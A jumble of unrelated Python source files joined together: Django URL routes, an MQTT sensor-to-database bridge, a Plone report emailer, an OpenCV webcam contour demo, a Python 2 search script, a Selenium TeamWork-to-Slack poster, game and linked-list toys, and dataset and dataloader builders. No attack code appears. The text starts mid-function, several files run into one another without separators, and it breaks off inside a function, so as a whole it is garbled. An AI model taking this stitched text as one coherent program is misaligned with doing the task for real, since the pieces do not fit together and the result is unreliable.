    # cc= checkWhich_RingFenHybrid_InFile(filePath)
    # aa = cc.check()
    # readouts = cc.readouts
    # r
    NSperClockTick = 11.356860963629653 #ns per tick ESS for 88.0525 MHz
    # list the (Ring, Fen, Hybrid) combinations present in the test file
    cc = checkWhich_RingFenHybrid_InFile(filePath,NSperClockTick).check()
    # pcap = pcapng_reader_PreAlloc(filePath,NSperClockTick)
    # pcap.allocateMemory()
    # pcap.read()
    # pcap = pcapng_reader(filePath, NSperClockTick, timeResolutionType = 'fine', sortByTimeStampsONOFF = False )
    # readouts = pcap.readouts
    # readoutsArray = readouts.concatenateReadoutsInArrayForDebug()
    # tdcs = VMM3A_convertCalibrate_TDCinSec(readouts.TDC, NSperClockTick).TDC_ns
    # timeS = readouts.timeHIs + 100e-9
    # timeDIff = readouts.timeStamp - readouts.timeHIns
    # - readouts.timeLOns*1e-9
    # aa = np.concatenate((readouts.timeStamp[:,None],readouts.timeHIs[:,None],readouts.timeLOns[:,None]*1e-9,tdcs[:,None],timeDIff[:,None]),axis=1)
    # aa = pr.d
    # bb = pr.e
    # aaa = aa[446900:,5:9]
    # bbb = bb[446900:,5:9]
    # for k in range(446900,447000,1):
    #     print(" \t Ring {}, FEN {}, VMM {}, hybrid {}, ASIC {}, Ch {}, Time {} s, BC {}, OverTh {}, ADC {}, TDC {}, GEO {} " \
    #     .format(vmm3.Ring[k],vmm3.Fen[k],vmm3.VMM[k],vmm3.hybrid[k],vmm3.ASIC[k],vmm3.Channel[k],vmm3.timeStamp[k],vmm3.BC[k],vmm3.OTh[k],vmm3.ADC[k],vmm3.TDC[k],vmm3.GEO[k]))
    tElapsedProfiling = time.time() - tProfilingStart
    # report the total wall-clock loading time
    print('\n Data Loading Completed in %.2f s' % tElapsedProfiling)
from django.conf.urls import url
from . import views
# URL routes for the authentication views of this app.
# NOTE(review): django.conf.urls.url is deprecated since Django 2.0 and was
# removed in Django 4.0 — migrate to django.urls.re_path (or path) on upgrade.
urlpatterns = [
    url(r'^login/$', views.userlogin, name='login'),
    url(r'^logout/$', views.userlogout, name='logout')
]
|
#!/usr/bin/env python3
import argparse
import logging
import time
import platform
import math
import re
import json
import iso8601
from sqlalchemy import create_engine
from sqlalchemy.orm import sessionmaker
from sqlalchemy.sql import table, column, select, update
from datetime import datetime
import paho.mqtt.client as mqtt
def main():
    """Bridge MQTT sensor messages into a SQL database.

    Subscribes to ``node/+/#``. A ``node/<id>/active`` message updates the
    device's ``last_active`` column; ``node/<id>/sensor/<type>`` inserts a
    row into ``measurements``. Runs forever (``loop_forever``).
    """
    logging.basicConfig()
    logger = logging.getLogger('storer')

    parser = argparse.ArgumentParser(prog="storer")
    parser.add_argument('--debug', '-d',
                        action='store_const',
                        const=logging.DEBUG,
                        dest='logging')
    parser.add_argument('--quiet', '-q',
                        action='store_const',
                        const=logging.WARNING,
                        dest='logging')
    parser.add_argument('--database', type=str,
                        default="sqlite:///database.sqlite")
    parser.add_argument('--broker', '-b', default="localhost", type=str)
    parser.add_argument('--broker-port', '-p', default=1883, type=int)
    parser.add_argument('--broker-user', '-U', type=str)
    parser.add_argument('--broker-password', '-P', type=str)
    parser.set_defaults(logging=logging.INFO)
    args = parser.parse_args()

    logging.getLogger().setLevel(args.logging)
    logger.debug("args=%r", args)

    engine = create_engine(args.database)
    new_session = sessionmaker(bind=engine)
    logger.debug("engine=%r new_session=%r", engine, new_session)

    client = mqtt.Client()
    if args.broker_user:
        client.username_pw_set(args.broker_user, args.broker_password)
    logger.debug("client=%r", client)

    def on_message(client, data, message):
        """Route one MQTT message to the matching database statement."""
        logger.debug("on_message: message.topic=%r message.payload=%r",
                     message.topic, message.payload)
        m = re.match(r'node/(\d+)/(.*)', message.topic)
        assert m
        device_id = int(m.group(1))
        path = m.group(2)
        logger.debug("node id=%d path=%r", device_id, path)
        if path == 'active':
            logger.debug("node active mark")
            engine.execute('update devices set last_active = ? where id = ?',
                           message.payload, device_id)
        elif path[0:7] == 'sensor/':
            payload = json.loads(message.payload.decode('utf-8'))
            device_type = path[7:]
            # fixed: previously logged the builtin `type` instead of the
            # parsed sensor type
            logger.debug("sensor type=%r", device_type)
            sensor_id, = engine.execute(
                'select id from sensors where device_id = ? and type = ?',
                device_id, device_type).first()
            logger.debug("sensor id=%r", sensor_id)
            engine.execute('insert into measurements (device_id, sensor_id, '
                           'sensed_time, stored_time, value) '
                           'values (?, ?, ?, ?, ?)',
                           device_id,
                           sensor_id,
                           iso8601.parse_date(payload['time']).isoformat(),
                           datetime.now().isoformat(),
                           float(payload['value']))
            logger.info("%d.%d @ %s = %-10s (%s)",
                        device_id, sensor_id,
                        iso8601.parse_date(payload['time']),
                        float(payload['value']), device_type)

    def on_connect(client, userdata, flags, rc):
        logger.info("Connected")
        # Subscribe inside on_connect so the subscription is re-established
        # automatically after a broker reconnect; a one-shot subscribe call
        # outside this callback is lost when the connection drops.
        client.subscribe('node/+/#')

    def on_disconnect(client, userdata, rc):
        logger.info("Disconnected")

    # Register all callbacks BEFORE connecting so no early message is
    # missed; on_disconnect previously existed but was never registered.
    client.on_connect = on_connect
    client.on_message = on_message
    client.on_disconnect = on_disconnect

    client.connect(args.broker, args.broker_port)
    logger.info("storer: Reading from %s:%s, storing to %s",
                args.broker, args.broker_port, args.database)
    client.loop_forever()


if __name__ == "__main__":
    main()
|
# -*- coding: utf-8 -*-
import logging
logger = logging.getLogger('[sm.idonethis]')
from datetime import datetime
from datetime import timedelta
from zope.component import getMultiAdapter
# from zope.publisher.interfaces import NotFound
import plone.api
from plone.memoize import view
from Products.Five.browser import BrowserView
# from Products.CMFPlone.utils import safe_unicode
from Products.statusmessages.interfaces import IStatusMessage
from ... import _
from ... import api
from ... import mail_utils
from ...utils import LazyList
class View(BrowserView):
    """ iDoneThis: daily report of the team's bookings for a given date.
    """
    DATE_FORMAT = '%d/%m/%Y'
    show_form = True
    default_send_to = 'Team <team@abstract.it>'
    @property
    def today(self):
        # current timestamp; a property so subclasses/tests can override it
        return datetime.now()
    @property
    def current_date(self):
        """Date the report refers to: the `by_date` request parameter, else yesterday."""
        # default to the day before today
        dt = self.today - timedelta(1)
        if self.request.get('by_date'):
            dt = self.request.get('by_date')
            dt = datetime.strptime(dt, self.DATE_FORMAT)
        return dt
    @property
    def current_date_display(self):
        # current_date rendered as dd/mm/yyyy
        return self.current_date.strftime(self.DATE_FORMAT)
    def date_range(self, dt):
        """Return (start, stop) datetimes spanning the whole day of `dt` (00:00-23:59)."""
        data = [
            dt.year,
            dt.month,
            dt.day
        ]
        start = data + [0, 0]
        stop = data + [23, 59]
        return (datetime(*start), datetime(*stop))
    @property
    def query(self):
        """Booking-query bounds covering the selected day."""
        date_query = self.date_range(self.current_date)
        query = {
            'from_date': date_query[0],
            'to_date': date_query[1],
        }
        return query
    def formatter(self, booking):
        """Render one booking through the `helpers` view into a minimal info dict."""
        helpers = getMultiAdapter(
            (booking, self.request),
            name="helpers"
        )
        info = helpers.info(user_details=False,
                            drop_refs_links=True,
                            minimal=True)
        return info
    @view.memoize
    def get_bookings(self):
        # memoized: SendEmail calls this once to check and once to render
        return api.booking.get_bookings(**self.query)
    def data(self):
        """Group the day's bookings by owner.

        Returns {'users': [user details sorted by fullname],
                 'bookings': {owner: LazyList of bookings}}.
        Bookings without a story and without a project are skipped.
        """
        users = {}
        bookings = {}
        for booking in self.get_bookings():
            if not booking.story and not booking.project:
                continue
            if booking.owner not in users:
                user_info = api.users.get_user_details(self.context,
                                                       booking.owner)
                users[booking.owner] = user_info
                bookings[booking.owner] = LazyList(
                    [], format_method=self.formatter)
            bookings[booking.owner].append(booking)
        return {
            # NOTE(review): dict.itervalues() is Python 2 only — this module
            # has not been ported to Python 3
            'users': sorted(users.itervalues(), key=lambda x: x.fullname),
            'bookings': bookings,
        }
class SendEmail(View):
    """Render the @@idonethis-content report and email it to the team."""
    # redirect back to the report page after sending (CronView disables this)
    redirect = True
    def __call__(self):
        # require an explicit `send_email` request key as confirmation
        if self.request.get('send_email'):
            return self.send_email()
        return "confirm send by providing `send_email` key"
    def send_email(self):
        """Send the report email.

        Returns 'ok'/'nobookings' (or redirects back to @@idonethis when
        `redirect` is set and a `status_message` request key is present).
        """
        view = self.context.restrictedTraverse('@@idonethis-content')
        bookings = view.get_bookings()
        status = 'ok'
        if not len(bookings) > 0:
            status = 'nobookings'
            logger.info('no bookings found...')
        else:
            # render the report without the date form, then wrap and send it
            view.show_form = False
            html = view()
            mailhost = plone.api.portal.get_tool('MailHost')
            pprops = plone.api.portal.get_tool('portal_properties')
            mto = self.request.get('send_to', self.default_send_to)
            mfrom = 'SM <{}>'.format(pprops.email_from_address)
            msubject = _(u"Abstract Team Done This") \
                + ' ' + self.current_date_display
            html = mail_utils.prepare_email_content(
                html, mfrom, mto, msubject)
            mailhost.send(html, mto, mfrom, msubject)
            logger.info('mail sent')
        if self.redirect and self.request.get('status_message'):
            if status == 'ok':
                msg = _('Email sent.')
            else:
                msg = _('No bookings, no email send.')
            messages = IStatusMessage(self.request)
            messages.add(msg, type="info")
            url = self.context.absolute_url() + '/@@idonethis'
            if self.request.get('QUERY_STRING'):
                # keep the original query string, minus the send_email trigger
                qstring = self.request['QUERY_STRING'].split('&send_email')[0]
                url += '?' + qstring
            self.request.response.redirect(url)
            return
        else:
            return status
class CronView(SendEmail):
    """Cron entry point: email the previous working day's report.

    Weekends are skipped entirely; on Monday the report covers Friday.
    """
    redirect = False
    DATE_FORMAT = '%d/%m/%Y'
    def __call__(self):
        today = datetime.today()
        weekday = today.weekday()
        # TODO: exclude holidays!
        if weekday in (5, 6):
            # saturday / sunday: nothing to send
            return
        if weekday == 0:
            # monday: report on the previous friday instead of yesterday
            friday = today - timedelta(3)
            self.request.form['by_date'] = friday.strftime(self.DATE_FORMAT)
        return self.send_email()
|
# coding: utf-8
# In[2]:
import cv2
import numpy as np
# # Contour - tracks continuous edges
#
# The contour retrieval modes are as follows
#
# cv2.RETR_EXTERNAL
#
# cv2.RETR_LIST
#
# cv2.RETR_CCOMP
#
# cv2.RETR_TREE
#
# The contour approximation modes are as follows
#
# cv2.CHAIN_APPROX_NONE
#
# cv2.CHAIN_APPROX_SIMPLE
#
# cv2.CHAIN_APPROX_TC89_L1
#
# cv2.CHAIN_APPROX_TC89_KCOS
# In[13]:
cap = cv2.VideoCapture(0)  # opening default camera
while cap.isOpened():
    ret, framee = cap.read()  # reading the frame
    if not ret:
        # no frame delivered (camera unplugged / end of stream) — previously
        # this fell through and cvtColor crashed on a None frame
        break
    frame = cv2.cvtColor(framee, cv2.COLOR_BGR2GRAY)  # converting to gray scale
    # frame = cv2.flip(frame, 90)
    ret, thresh = cv2.threshold(frame, 127, 255, 0)
    # findContours returns (img, contours, hierarchy) on OpenCV 3.x but only
    # (contours, hierarchy) on 4.x; taking the last two values works on both
    ctrs, hier = cv2.findContours(thresh, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)[-2:]
    # draw all external contours in red on the original colour frame
    cv2.drawContours(framee, ctrs, -1, (0, 0, 255), 3)
    cv2.imshow("thers", framee)
    if cv2.waitKey(1) == 27:  # ESC quits
        break
cap.release()
cv2.destroyAllWindows()
|
from operator import *
class QueryResult:
    """A single search hit: page URL, its indexed title text, and its PageRank score."""
    def __init__(self, url, title, pagerank):
        # fixed: these were spelled `_init_`/`_repr_` (single underscores),
        # so Python never invoked them — constructing QueryResult(url, title,
        # pagerank) raised TypeError and repr() fell back to the default
        self.url = url
        self.title = title
        self.pagerank = pagerank
    def __repr__(self):
        return repr((self.url, self.title, self.pagerank))
#Store file index into an array
# NOTE(review): Python 2 script (print statements, raw_input below).
# The file handles are never closed and `f` is rebound each time a new
# file is opened; the three arrays are assumed to be parallel (same length).
f= open('index.txt', 'r')
index= []
line= f.readline()
while line != "":
    t= line
    t= t.lower()
    t= t.strip()
    index.append(t)
    line= f.readline()
#Store file pagerank into an array
f= open('pagerank.txt', 'r')
pagerank= []
line= f.readline()
while line != "":
    line= line.strip()
    p= float(line)
    pagerank.append(p)
    line=f.readline()
#Store file test3 into an array
f= open('test3.txt', 'r')
line= f.readline()
pages= []
while line != "":
    string= line.split()
    url= string[1]
    pages.append(url)
    line= f.readline()
#Search index based on query inputed by user
# Loop until the sentinel "ZZZ" is entered; prints the top-5 matches
# ranked by pagerank (substring match against the indexed title text).
a= 0
while a == 0:
    results= []
    term= raw_input("Enter Search Term: ")
    term= term.strip()
    if term == "ZZZ":
        a= 1
    else:
        term= term.lower()
        for i in range(len(pages)):
            url= pages[i]
            if index[i].find(term) != -1:
                results.append((url, index[i], pagerank[i]))
        if results == []:
            print "No results for: " + term
        else:
            # sort by pagerank (tuple position 2), highest first
            results= sorted(results, key=lambda queryresult: queryresult[2], reverse= True)
            j= 0
            while j < 5 and j < len(results):
                print results[j]
                j= j + 1
|
from selenium import webdriver
from bs4 import BeautifulSoup
import time
import pickle
import os
import random
import math
import yaml
import sys
import argparse
with open("config.yml", 'r') as ymlfile:
    # Parse credentials, URLs and the webdriver path once at startup.
    cfg = yaml.load(ymlfile, Loader=yaml.SafeLoader)
# Shared Chrome instance used by the TeamWork helpers below.
driver = webdriver.Chrome(cfg['WebDriverPath'])
def login_and_search(tuser, tpassword):
    """Log into TeamWork with the given credentials via the shared ``driver``.

    Args:
        tuser: TeamWork login e-mail.
        tpassword: TeamWork password.

    Returns:
        The module-level ``driver`` for chaining.
    """
    #open login page
    driver.get('https://team.website.com/#/projects/405949/time')
    #enter username
    email = driver.find_element_by_xpath('//*[@id="loginemail"]')
    email.send_keys(tuser) # change it to your username
    #enter password
    password = driver.find_element_by_xpath('//*[@id="loginpassword"]')
    password.send_keys(tpassword) #change it to your password
    #click login
    login = driver.find_element_by_xpath('//*[@id="app"]/div[1]/section/div[2]/div[2]/div/div/div/form/div[2]/button')
    login.click()
    return driver
def login_and_search_slack(suser, spassword):
    """Log into Slack in the dedicated Slack browser window.

    Args:
        suser: Slack account e-mail.
        spassword: Slack account password.

    Returns:
        The module-level ``driver_slack`` instance.
    """
    #open login page
    driver_slack.get('https://mycompany.slack.com/')
    #maximize the window
    #driver.maximize_window()
    #enter username
    email = driver_slack.find_element_by_xpath('//*[@id="email"]')
    email.send_keys(suser) # change it to your username
    #enter password
    password = driver_slack.find_element_by_xpath('//*[@id="password"]')
    password.send_keys(spassword) #change it to your password
    #click login
    login = driver_slack.find_element_by_xpath('//*[@id="signin_btn"]')
    login.click()
    # BUG FIX: the original returned the TeamWork ``driver`` instead of the
    # Slack driver this function actually operates on.
    return driver_slack
def get_page_links(linkz, itemnumber, CBList = 0):
    """Scrape the TeamWork time page at *linkz* and build the Slack summary text.

    Args:
        linkz: URL of the TeamWork project time page.
        itemnumber: which date section/table on the page to read.
        CBList: comma-separated capacity-building topics, or 0 to disable.

    Returns:
        The formatted message string to post to Slack.
    """
    driver.get(linkz)
    time.sleep(10)  # let the single-page app render before scraping
    soup = BeautifulSoup(driver.page_source, 'lxml')
    print('Collecting Information...')
    data = []
    table = soup.find_all('table', attrs={'class':'w-time-grid'})
    #table_body = table.find('tbody')
    project = soup.find('h1', attrs={'class':'w-header-titles__project-name'}).text.strip()
    listdate = soup.find_all('h4', attrs={'class':'gridHeading subTitle'})
    listdate = listdate[itemnumber].text.strip()
    rows = table[itemnumber].find_all('tr')
    tasks = []
    del rows[0]  # drop the header row
    for row in rows:
        cols = row.find_all('td')
        tasks.append(cols[1].text.strip())  # column 1 holds the task name
        cols = [ele.text.strip() for ele in cols]
        data.append([ele for ele in cols if ele])
    #print(data)
    table2 = soup.find_all('table', attrs={'class':'w-time-list__totals-table'})
    rows = table2[itemnumber].find_all('tr')
    data2 = []
    for row in rows:
        cols = row.find_all('td')
        cols = [ele.text.strip() for ele in cols]
        data2.append([ele for ele in cols if ele])
    print('cleaning Information...')
    # Slack mrkdwn: *date*, *_project_*, "+++ task" bullet lines, then totals.
    texttopost = '*' + listdate + '*\n'
    texttopost = texttopost + '*_' + project + '_*\n'
    texttopost = texttopost + '+++ ' + '\n+++ '.join(tasks) + '\n'
    # Rows 0/2/3 of the totals table: total, non-billable, billable hours.
    texttopost = texttopost + 'Total: `' + rows[0].find_all('td')[1].text.strip() + '`\n'
    texttopost = texttopost + 'None Billable: `' + rows[2].find_all('td')[1].text.strip() + '`\n'
    texttopost = texttopost + 'Billable: `' + rows[3].find_all('td')[1].text.strip() + '`\n'
    totalhours = float(rows[0].find_all('td')[2].text.strip())
    if CBList != 0:
        listCBitems = CBList.split(',') # ['Drupal','Wordpress','Android','Server','Youtube Intergration']
        if totalhours < 8:
            # Pad a day shorter than 8h with a random capacity-building entry.
            CBhours = str(float(8 - totalhours))
            Numbx = CBhours.split('.')
            d, i = (Numbx[1], Numbx[0]) #math.modf(CBhours)
            # NOTE(review): minutes = 0.6 * fraction-digits; correct only when
            # the fraction has two digits ('.25' -> 15), while '.5' yields 3,
            # not 30 -- confirm intended.
            minu = str(int(0.6 * int(d)))
            hour = str(int(i))
            randomtitle = ''
            if listCBitems:
                randomtitle = '+++ ' + str(listCBitems[random.randrange(len(listCBitems))]) + ' '
            texttopost = texttopost + '*_Capacity building_*\n' + randomtitle + ' `' + hour + ' Hours And ' + minu[:2] + ' Minutes`\n'
    print('Generating Text...')
    print(texttopost)
    return texttopost
def post_toslack(linkz, texttopost):
    """Open the Slack channel at *linkz* and type *texttopost* into the message box."""
    print('openings Channel...')
    driver_slack.get(linkz)
    time.sleep(20)
    print('Posting Text...')
    message_box = driver_slack.find_element_by_xpath('//*[@id="undefined"]')
    message_box.send_keys(texttopost)
########################################### MAIN ###################################
print('Opening TeamWork...')
login_and_search(cfg['teamuser'],cfg['teampassword'])
time.sleep(20)  # wait for the dashboard to finish loading after login
print('Going to Time Page...')
texttopost = get_page_links(cfg['projectURL'], cfg['ListNumber'], cfg['RandomCBSubjects'])
driver.quit()
print('TeamWork Closed.')
print('Opening Slack...')
# Second browser instance, used by the *_slack helpers above.
driver_slack = webdriver.Chrome(cfg['WebDriverPath'])
#time.sleep(10)
print('Login Slack...')
login_and_search_slack(cfg['slackuser'],cfg['slackpassword'])
#time.sleep(20)
post_toslack(cfg['slackchannelURL'], texttopost)
#driver.quit()
####################################################################################
|
from random import *
class HealthPotion():
    """A randomly rolled stash of health potions.

    Attributes:
        contain:  how many potions the stash holds.
        category: strength roll; > 50 is a big potion, 1..49 a small one,
                  <= 0 none.  (NOTE: category == 50 falls through to the
                  "no potion"/"NONE" branches -- preserved original behavior.)
    """

    #Constructs a name, the amount in the potion, and if it is large or small
    def __init__(self, contain, category):
        self.contain = contain
        self.category = category

    #Gets what kind of potion it is
    def get_potion_type(self):
        """Print the potion strength implied by the category roll."""
        if self.category > 50:
            print("Congrats! This heals for 50 health.")
        elif self.category < 50 and self.category > 0:
            # FIX: corrected the "helat+h" typo in the message.
            print("This heals for 25 health.")
        else:
            print("Not your lucky day... there is no health potion...")

    #Gets the amount of the potion inside
    def get_amount(self):
        """Print how many potions were found."""
        if self.contain == 0 and self.category == 0:
            print("Stopping turning over the box... THERE IS NOTHING HERE!!!")
        elif self.contain > 0 and self.contain <= 4:
            # BUG FIX: the original concatenated the int ``contain`` directly
            # to a str, raising TypeError; str() makes it printable.
            print("You have found " + str(self.contain) + " amount of potions, Pick some up")
        else:
            print("You have found many potions! You can take up to 7")

    #Gets the name of the potion
    def get_name(self):
        """Print the potion's size name."""
        if self.category > 50:
            print("BIG POTION")
        elif self.category < 50:
            print("SMALL POTION")
        else:
            print("NONE HAHAHA")

    def set_contained(self):
        """Re-roll the stash size (0..5)."""
        self.contain = randrange(0,6)

    def set_types(self):
        """Re-roll the strength category (0..84)."""
        self.category = randrange(0,85)
|
# calculates sum of two linked lists
class ListNode (object):
    """Singly linked list node holding one decimal digit."""

    def __init__(self, x):
        self.val = x
        self.next = None


def add_two_numbers(node, l1, l2, c =0):
    """Digit-wise sum of lists l1 and l2 (least-significant digit first).

    If *node* is falsy a new head is created and returned; otherwise the
    result digits are appended after *node* and *node* is returned
    (matching the original dummy-head call pattern).

    Bug fixes vs. the original:
    - the incoming carry *c* was ignored when computing the next carry;
    - recursing with a None node silently dropped every digit after the first;
    - a final carry out of the last digit (e.g. 5 + 5) was lost;
    - lists of unequal length stopped at the shorter one (missing digits
      now count as 0).
    """
    total = l1.val + l2.val + c
    c = 1 if total >= 10 else 0
    if (not(node)):
        node = ListNode(total % 10)
        tail = node
    else:
        node.next = ListNode(total % 10)
        tail = node.next
    n1, n2 = l1.next, l2.next
    if n1 or n2:
        # A missing digit on the shorter list counts as 0.
        add_two_numbers(tail, n1 or ListNode(0), n2 or ListNode(0), c)
    elif c:
        # Don't drop a carry out of the most significant digit.
        tail.next = ListNode(c)
    return node
# Build 342 (as 2->4->3) and 465 (as 5->6->4), least-significant digit first.
l1= ListNode (2)
l1.next = ListNode (4)
l1.next.next = ListNode (3)
l2 = ListNode (5)
l2.next = ListNode (6)
l2.next.next = ListNode (4)
# NOTE(review): the dummy head is seeded with the *class* ``object`` as its
# value, so the loop below prints "<class 'object'>" before the sum digits.
l3 = ListNode(object)
result = add_two_numbers(l3, l1, l2)
while result:
    print (result.val),
    result = result.next
'''
Build a dataset with train-val-test splits from the generated data from
'''
import sys; sys.path.insert(0, '../util')
from platform_config import data_dir, mkdir2
import os, glob, random, math
from os.path import join
from shutil import copy2
import numpy as np
# for converting to indexed images
from PIL import Image
from cityscapes import c2clabelfromrgb, cm_train
build_dir = mkdir2(join(data_dir, 'Exp/C20_S1')) # gen 18, weather 2, subsampling step 1
train_source_dir = join(data_dir, 'Exp/CARLA_gen20')
test_source_dir = join(data_dir, 'Exp/CARLA_gen20_town2')
rgb_dir = mkdir2(join(build_dir, 'RGB-1024'))
seg_dir = mkdir2(join(build_dir, 'Seg-1024'))
# Frames copied per sequence.
n_frame = 10000
# Sequence folders are named 'e*'; keep only directories, sorted for determinism.
train_seqs = glob.glob(join(train_source_dir, 'e*'))
train_seqs = sorted(list(filter(lambda s: os.path.isdir(s), train_seqs)))
test_seqs = glob.glob(join(test_source_dir, 'e*'))
test_seqs = sorted(list(filter(lambda s: os.path.isdir(s), test_seqs)))
# Last n_val training sequences become the validation split.
n_val = 2
n_train = len(train_seqs) - n_val
seqs = train_seqs + test_seqs
n_seq = len(seqs)
# Per-split frame counters and manifest file handles (train/val/test).
cnts = 3*[0]
f = 3*[None]
splits = ['train', 'val', 'test']
for s in range(3):
    mkdir2(join(rgb_dir, splits[s]))
    mkdir2(join(seg_dir, splits[s]))
# ``as f[0]`` etc. binds each manifest handle into the f list by subscript.
with open(join(build_dir, 'original-filename-train.txt'), 'w') as f[0], \
    open(join(build_dir, 'original-filename-val.txt'), 'w') as f[1], \
    open(join(build_dir, 'original-filename-test.txt'), 'w') as f[2]:
    for i in range(n_seq):
        print('Processing %d/%d - %s' % (i + 1, n_seq, seqs[i]))
        seq_name = os.path.basename(seqs[i])
        # Split assignment: first n_train seqs -> train, next n_val -> val,
        # everything from the town2 source -> test.
        if i < n_train:
            s = 0
        elif i < n_train + n_val:
            s = 1
        else:
            s = 2
        for j in range(n_frame):
            cnts[s] += 1
            inname = '%08d.png' % (j + 1)
            outname = '%08d.png' % cnts[s]
            # Copy RGB and segmentation frames under a split-global index,
            # and record the original path in the split's manifest.
            copy2(join(seqs[i], 'RGB', inname), join(rgb_dir, splits[s], outname))
            copy2(join(seqs[i], 'Seg', inname), join(seg_dir, splits[s], outname))
            f[s].write(seq_name + '/RGB/' + inname + '\n')
from django.conf.urls import url
from . import views
app_name = 'telegram_bots'
# NOTE(review): the '<bot_token>' catch-all matches any path, so it must stay
# the last entry -- routes declared after it would be shadowed.
urlpatterns = [
    url(
        regex=r'^$',
        view=views.BotListView.as_view(),
        name='list',
    ),
    url(
        regex=r'^(?P<pk>\d+)/$',
        view=views.BotDetailView.as_view(),
        name='detail',
    ),
    url(
        regex=r'^~create/$',
        view=views.BotCreateView.as_view(),
        name='create',
    ),
    url(
        regex=r'^~update/$',
        view=views.BotUpdateView.as_view(),
        name='update',
    ),
    url(
        regex=r'^~delete/$',
        view=views.BotDeleteView.as_view(),
        name='delete',
    ),
    url(
        regex=r'^~subscribe/(?P<signature>.+)/$',
        view=views.BotSubscribeView.as_view(),
        name='subscribe'
    ),
    # Webhook endpoint: the bot token itself is the URL segment.
    url(
        regex=r'^(?P<bot_token>.+)/$',
        view=views.CommandReceiveView.as_view(),
        name='auth'
    ),
]
import torch
from torch.utils.data import DataLoader
from data.jigsaw_dataset import JigsawDataset, JigsawTestDataset
from data.rotate_dataset import RotateDataset, RotateTestDataset
from data.image_dataset import ImageDataset, ImageTestDataset
from data.concat_dataset import ConcatDataset
from data.transformers import get_jig_train_transformers, get_train_transformers, get_train_transformers_fgadr
from data.transformers import get_val_transformer, get_multi_crop_transformers
from data.transformers import get_image_train_transformer, get_image_test_transformer
from data.fgdr_dataset import FGADRDataset, FGADRTestDataset
from data.kaggleR_dataset import KaggleRDataset, KaggleRTestDataset
class Subset(torch.utils.data.Dataset):
    """A random fixed-size view over another dataset.

    Holds ``limit`` indices drawn without replacement (``torch.randperm``)
    and forwards item access through them.
    """

    def __init__(self, dataset, limit):
        self.dataset = dataset
        self.indices = torch.randperm(len(dataset))[:limit]

    def __getitem__(self, idx):
        chosen = self.indices[idx]
        return self.dataset[chosen]

    def __len__(self):
        return len(self.indices)
def get_train_val_dataloader(args):
    """Build train and validation DataLoaders for the datasets in args.name.

    NOTE(review): for 'FGADR'/'KaggleR' the function returns inside the loop
    on the first matching name, ignoring any remaining entries of
    ``dataset_list`` -- presumably intentional; confirm with callers.
    """
    dataset_list = args.name
    assert isinstance(dataset_list, list)
    datasets = []
    val_datasets = []
    limit = args.limit
    # print("dataset_list: ", dataset_list)
    # image mode
    mode = args.get('mode', 'RGB')
    for dname in dataset_list:
        print(dname)
        if dname == 'FGADR':
            # print("coming to FGADR")
            img_transformer = get_train_transformers_fgadr(args)
            train_dataset = FGADRDataset(dname, split='train', val_size=args.val_size,
                                         img_transformer=img_transformer,
                                         rot_classes=args.aux_classes,
                                         bias_whole_image=args.bias_whole_image, mode=mode)
            val_dataset = FGADRDataset(dname, split='val', val_size=args.val_size,
                                       img_transformer=get_train_transformers_fgadr(args), rot_classes=args.aux_classes,
                                       mode=mode)
            loader = torch.utils.data.DataLoader(train_dataset, batch_size=args.batch_size, shuffle=True, num_workers=4,
                                                 pin_memory=True, drop_last=True)
            val_loader = torch.utils.data.DataLoader(val_dataset, batch_size=args.batch_size, shuffle=False,
                                                     num_workers=4, pin_memory=True, drop_last=False)
            return loader, val_loader
        elif dname == 'KaggleR':
            print("coming to KaggleR")
            img_transformer = get_train_transformers_fgadr(args)
            train_dataset = KaggleRDataset(dname, split='train', val_size=args.val_size,
                                           img_transformer=img_transformer,
                                           rot_classes=args.aux_classes,
                                           bias_whole_image=args.bias_whole_image, mode=mode)
            val_dataset = KaggleRDataset(dname, split='val', val_size=args.val_size,
                                         img_transformer=get_train_transformers_fgadr(args), rot_classes=args.aux_classes,
                                         mode=mode)
            loader = torch.utils.data.DataLoader(train_dataset, batch_size=args.batch_size, shuffle=True, num_workers=4,
                                                 pin_memory=True, drop_last=True)
            val_loader = torch.utils.data.DataLoader(val_dataset, batch_size=args.batch_size, shuffle=False,
                                                     num_workers=4, pin_memory=True, drop_last=False)
            return loader, val_loader
        else:
            # Self-supervised task type selects the dataset/transformer pair.
            if args.type == 'jigsaw':
                img_transformer, tile_transformer = get_jig_train_transformers(args)
                train_dataset = JigsawDataset(dname, split='train', val_size=args.val_size,
                                              img_transformer=img_transformer, tile_transformer=tile_transformer,
                                              jig_classes=args.aux_classes, bias_whole_image=args.bias_whole_image)
                val_dataset = JigsawTestDataset(dname, split='val', val_size=args.val_size,
                                                img_transformer=get_val_transformer(args), jig_classes=args.aux_classes)
            elif args.type == 'rotate':
                img_transformer = get_train_transformers(args)
                train_dataset = RotateDataset(dname, split='train', val_size=args.val_size,
                                              img_transformer=img_transformer,
                                              rot_classes=args.aux_classes,
                                              bias_whole_image=args.bias_whole_image, mode=mode)
                val_dataset = RotateTestDataset(dname, split='val', val_size=args.val_size,
                                                img_transformer=get_val_transformer(args), rot_classes=args.aux_classes, mode=mode)
            elif args.type == 'image':
                img_transformer = get_image_train_transformer(args)
                train_dataset = ImageDataset(dname, split='train', val_size=args.val_size,
                                             img_transformer=img_transformer, mode=mode)
                val_dataset = ImageTestDataset(dname, split='val', val_size=args.val_size,
                                               img_transformer=get_val_transformer(args), mode=mode)
            # Optionally cap the training set size with a random subset.
            if limit:
                train_dataset = Subset(train_dataset, limit)
            datasets.append(train_dataset)
            val_datasets.append(val_dataset)
    dataset = ConcatDataset(datasets)
    val_dataset = ConcatDataset(val_datasets)
    loader = torch.utils.data.DataLoader(dataset, batch_size=args.batch_size, shuffle=True, num_workers=4, pin_memory=True, drop_last=True)
    val_loader = torch.utils.data.DataLoader(val_dataset, batch_size=args.batch_size, shuffle=False, num_workers=4, pin_memory=True, drop_last=False)
    return loader, val_loader
def get_target_dataloader(args):
    """Build the training DataLoader for the single target dataset ``args.name``."""
    name = args.name
    mode = args.get('mode', 'RGB')
    if name == 'FGADR':
        img_transformer = get_train_transformers_fgadr(args)
        dataset = FGADRDataset(name, 'train', img_transformer=img_transformer,
                               rot_classes=args.aux_classes, bias_whole_image=args.bias_whole_image, mode=mode)
        loader = torch.utils.data.DataLoader(dataset, batch_size=args.batch_size,
                                             shuffle=True, num_workers=4, pin_memory=True, drop_last=True)
        return loader
    elif name == 'KaggleR':
        img_transformer = get_train_transformers_fgadr(args)
        dataset = KaggleRDataset(name, 'train', img_transformer=img_transformer,
                                 rot_classes=args.aux_classes, bias_whole_image=args.bias_whole_image, mode=mode)
